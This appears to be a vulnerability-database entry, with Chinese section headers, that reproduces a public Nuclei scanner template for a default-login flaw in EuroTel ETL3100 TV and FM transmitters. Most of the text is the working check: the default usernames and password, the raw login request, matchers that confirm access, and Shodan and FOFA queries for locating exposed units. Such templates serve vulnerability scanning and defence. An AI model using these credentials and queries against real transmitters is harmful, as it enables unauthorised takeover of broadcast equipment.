漏洞描述
The TV and FM transmitter uses a weak set of default administrative credentials that can be guessed in remote password attacks and gain full control of the system.
etl3100-default-login: EuroTel ETL3100 - Default Login
PoC代码[已公开]
id: etl3100-default-login
info:
name: EuroTel ETL3100 - Default Login
author: r3Y3r53
severity: high
description: |
The TV and FM transmitter uses a weak set of default administrative credentials that can be guessed in remote password attacks and gain full control of the system.
reference:
- https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5782.php
- https://www.exploit-db.com/exploits/51684
classification:
cpe: cpe:2.3:h:eurotel:etl3100:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
vendor: eurotel
product: etl3100
shodan-query: html:"ETL3100"
fofa-query: body="ETL3100"
tags: misconfig,default-login,eurotel,vuln
http:
- raw:
- |
POST /index.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
txtUserId={{username}}&txtPassword={{password}}&btnLogin=Login
- |
GET /exciter.php HTTP/1.1
Host: {{Hostname}}
attack: pitchfork
payloads:
username:
- user
- operator
password:
- etl3100rt1234
matchers:
- type: dsl
dsl:
- 'status_code_2 == 200'
- 'contains_all(body_2, "FM Exciter", "Summary", "/logout.php")'
condition: and
# digest: 4b0a00483046022100cd6cd12a677d477d58f4c5c7e56037e65533142508c7b14e27062d7d5d32855202210093893e047462d3ab1e5e3990c89828e5f726f49bce6ffbcb9659c21c10c186ac:922c64590222798bb761d5b6d8e72950